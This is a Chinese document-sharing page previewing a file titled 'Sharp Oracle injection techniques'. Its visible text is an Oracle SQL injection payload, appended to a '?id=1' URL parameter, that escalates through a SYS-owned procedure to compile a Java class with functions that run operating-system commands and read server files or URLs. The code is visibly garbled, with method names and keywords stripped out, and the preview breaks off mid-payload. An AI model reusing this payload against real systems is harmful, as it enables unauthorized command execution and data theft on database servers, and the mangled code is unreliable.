下载此文档

犀利的oracle注入技术.doc


文档分类:IT计算机 | 页数:约30页 举报非法文档有奖
1/30
下载提示
  • 1.该资料是网友上传的,本站提供全文预览,预览什么样,下载就什么样。
  • 2.下载该文档所得收入归上传者、原创者。
  • 3.下载的文档,不会出现我们的网址水印。
1/30 下载此文档
文档列表 文档介绍
。以下的演示都是在web上的sqlplus执行的,.....改成/?id=1and'1'<>'a'||(.....)的形式即可。(用"'a'||"是为了让语句返回true值)语句有点长,可能要用post提交。以下是各个步骤:,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:/?id=1and'1'<>'a'||(('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTEIMMEDIATE''DECLAREPRAGMAAUTONOMOUS_TRANSACTION;BEGINEXECUTEIMMEDIATE''''"LinxUtil".*;lassLinxUtilextendsObject{publicstaticStringrunCMD(Stringargs){try{BufferedReadermyReader=newBufferedReader(newInputStreamReader(().exec(args).getInputStream()));Stringstemp,str="";while((stemp=())!=null)str+=stemp+"\n";();returnstr;}catch(Exceptione){();}}publicstaticStringreadFile(Stringfilename){try{BufferedReadermyReader=newBufferedReader(newFileReader(filename));Stringstemp,str="";while((stemp=())!=null)str+=stemp+"\n";();returnstr;}catch(Exceptione){();}}}'''';END;'';END;--','SYS',0,'1',0)fromdual)************('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTEIMMEDIATE''DECLAREPRAGMAAUTONOMOUS_TRANSACTION;BEGINEXECUTEIMMEDIATE''''pilejavasourcenamed"LinxUtil".*;.URL;{publicstaticStringrunCMD(Stringargs){try{BufferedReadermyReader=newBufferedReader(newInputStreamReader(().exec(args).getInputStream()));Stringstemp,str="";while((stemp=())!=null)str+=stemp+"\n";();returnstr;}catch(Exceptione){();}}publicstaticStringreadFile(Stringfilename){try{BufferedReadermyReader=newBufferedReader(("http")?newInputStreamReader(newURL(filename).openStream()):newFileReader(filename));Stringstemp,str="";wh

犀利的oracle注入技术 来自淘豆网m.daumloan.com转载请标明出处.

相关文档 更多>>
非法内容举报中心
文档信息
  • 页数30
  • 收藏数0 收藏
  • 顶次数0
  • 上传人wxc6688
  • 文件大小146 KB
  • 时间2019-12-02